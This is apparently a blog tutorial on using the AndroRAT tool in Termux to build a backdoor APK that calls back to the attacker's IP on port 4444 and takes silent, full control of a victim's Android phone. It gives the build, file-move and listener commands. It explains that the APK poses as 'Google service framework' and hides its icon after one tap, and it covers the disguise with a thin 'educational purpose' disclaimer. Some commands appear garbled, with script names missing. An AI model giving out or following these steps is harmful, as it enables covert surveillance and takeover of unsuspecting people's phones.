Silently take full control over an Android phone using AndroRAT on Termux application (Android App) | Hack any android devices for educational purpose

How to hack or take full control silently over an android phone using the AndroRAT tool from Termux? or How to use AndroRAT on Termux app?

Before using AndroRAT on Termux, it is important to know how to install AndroRAT tool on Termux. Here is a link to another blog that mentions all the details about " How to install AndroRAT on Termux." link:

To use AndroRAT, Python3 and JAVA need to be installed on Termux.

*Open Termux App

to build a backdoor need an IP address where the victim's device will send all data silently.

first, need to know our IP address.


ifconfig ()

Now, make the backdoor apk file, 


cd AndroRAT ()

python3 --build -i -p 4444 -o aioyc.apk ()

(To build the backdoor type "--build" and to get the sessions type "--shell", -i = IP & -p = Port)

*The backdoor apk file is ready. but the apk file will save in AndroRAT folder which can not be read/write if the device is not rooted. so simply move the apk file to the internal storage of the phone which can be read/write with build-in installed file manager. so for that, 


mv aioyc.apk /storage/emulated/0/ ()
(The apk file will move to internal storage and can be shared to any other android devices)

*Now type:

python3 --shell -i -p 4444 ()

After typing this command wait for a minutes, AndroRAT tool shell will open.
Now share the apk file to the victim's android phone and install it. the apk file will show on android phone as " Google service framework.apk " . after installing the backdoor app just tap on the app for a single time. the app icon will hide automatically. and the session will start in AndroRAT shell terminal.

After installing the apk file on the victim's Android phone then the Interpreter session will start in Termux automatically. 
then type " help " and hit enter then all the commands will appear on the screen which can be used to take control silently over an android phone. 

*Now you can execute any of these commands and get full access to the victim's android phone. but always remember never to use this for illegal purposes. use it only for educational purposes. 

Important Links: 


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